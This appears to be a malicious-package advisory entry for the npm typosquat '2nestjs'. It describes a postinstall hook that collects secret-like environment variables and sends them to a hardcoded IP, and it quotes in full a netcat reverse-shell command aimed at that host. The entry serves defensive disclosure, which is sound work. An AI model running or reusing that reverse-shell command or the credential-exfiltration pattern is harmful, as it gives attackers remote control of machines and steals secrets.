MAL-2026-15911

    Dashboard / Malicious Package / MAL-2026-15911

    MAL-2026-15911

    Published: 4 Sept 2026Last Modified: 4 Sept 2026

    Summary: Malicious code in 2nestjs (npm)

    Details: Source: amazon-inspector (c9471c1fdd6ae99da48e44b8588f9e36814ce2859f2d25641b06cc53cf42174d) The package's postinstall hook executes index.js, which enumerates process.env, filters keys matching /^(SECRET|API|TOKEN|KEY)/, JSON-serializes the matched values, and writes them over a raw TCP socket to the hardcoded remote host 84.32.22.44:9999 (loaded from servers.json). The same postinstall path also invokes `nc -e /bin/sh 84.32.22.44 9999`, establishing an interactive reverse shell to the same host and granting the remote operator arbitrary command execution on the installer's machine. The package's own package.json description labels it a typosquat of nestjs and the author identifier is typosquat-bot, and the module's export logs '2nestjs loaded -- targeting nestjs' — the package name is a numeric-prefix lookalike of the widely used nestjs package.

    Affected packages

    Package

    Name: 2nestjs

    Purl: pkg:npm/2nestjs

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    0.0.1